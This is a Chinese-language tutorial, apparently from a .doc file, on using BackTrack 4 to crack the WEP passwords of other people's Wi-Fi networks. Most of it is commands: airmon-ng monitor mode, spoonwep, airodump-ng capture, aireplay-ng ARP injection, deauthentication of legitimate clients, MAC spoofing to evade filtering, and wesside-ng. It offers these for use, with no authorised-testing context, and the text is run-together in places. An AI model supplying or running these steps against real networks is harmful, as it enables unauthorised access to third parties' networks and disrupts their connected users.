BT4使用教程.doc

下载的BT4 解压，得到BOOT 和BT4 两个文件，放d 盘根目录下。将spoowep2.lzm 放到D:\BT4\modules 下，重启电脑，到dos 下。 输入： d: 回车 cd boot 回车 cd dos 回车 cd bt4 回车 输入： root 回车 toor 回车(注意屏幕上不显示字母，只管输) startx 回车 （不要输入xconf，不然进不了bt4，这里跟bt3 不同） 打开用命令生成器生成的TXT 文件，打开一个窗口 复制、粘贴、执行 ifconfig –a Wlan0 就是瑞银 执行： airmon-ng start wlan0 6 瑞银端口变为mon0 执行： ln -fs bash /bin/sh 执行： ls -al /bin/sh 有bash 成功 执行：spoonwep 第一个，网卡选mon0。 第二个选 normal 第三个选 unknown victim 点next 点launch，在右下角会出来spoonwep vict.scan,点击 回到上一个界面 有 √的为有客户端，破解起来比较容易 选择要破解的ESSID 后 ，点selection ok 第一个框选 fragmentation ＆ forge attack 其他默认， 再选launchData 在涨，到1w5 左右，密码自动会跳出来。这个我以前用760n 破解过，就不继续 下去啦。 BT4无线上网破解教程 1.启动BT4，选1024x768图形模式，用户名root,密码toor（如果需要），执行startx进入桌面。注释说明：[] 可选回显/ 或者() 提示---------------------WEP---------------------------------------命令行窗口 1:----------------------1.ifconfig -awlan0 ... xx:xx:xx:xx:xx:xx[macchanger -m 00:11:22:33:44:55 wlan0修改自己网卡的MAC 地址。当对方设置了MAC 地址过滤时或为了方便后面输入]2.ifconfig -a wlan0 up3.airmon-ng start wlan0 6monitor mode enabled on mon0(6是频道)另一说5100要支持注入用airmon-ng start wlan0如果这里回显(monitor mode enabled) 则下面命令所有端口号要用wlan0[aireplay-ng -9 mon0 / aireplay-ng --test mon0Injection is working/No anwser(注入攻击成功/不成功)(检测你的网卡是否支持注入)]4.airodump-ng -w pack -c 6 mon0/wlan0(pack是随便起的获取的ivs的保存文件的名字)另一说用airodump-ng --ivs -w pack -c 6 mon0/wlan0------------------命令行窗口2:---------------------一、有客户端：破解:abcd四种方式a.合法客户端产生大量有效的数据，能直接获得大量cap。收到10000以上data后，直接转命令行窗口3,破解密码b.合法客户端只能产生少量数据，就需要注入-3攻击加速产生大量数据。5.aireplay-ng -3 -b 000000000000(APmac) -h 111111111111(合法客户端mac) mon0/wlan0(wlan0测试不行)Read 11542 packets got 12587 ARP ...,send 71524 packets ... 很多类似行c.合法客户端不在通信，注入模式不成功，用-0 冲突模式强制断开合法客户端和ap连接，使之重新连接，新连接所产生的握手数据让-3 获得有效的ARP从而完成ARP注入5.aireplay-ng -3 -b 000000000000(APmac) -h 111111111111(合法客户端mac) wlan06.aireplay-ng -0 10 -a 000000000000(APmac) -c 111111111111(合法客户端mac) wlan0(可能要另开窗)d.有客户端，并且客户端能产生有效arp 数据的另类破解方式输入modprobe –r iwl3945(加载网卡)输入modprobe ipwraw输入airmon-ng start wlan0 6现在，只要一个命令就搞定，输入:输入wesside-ng -i wlan0 -v 01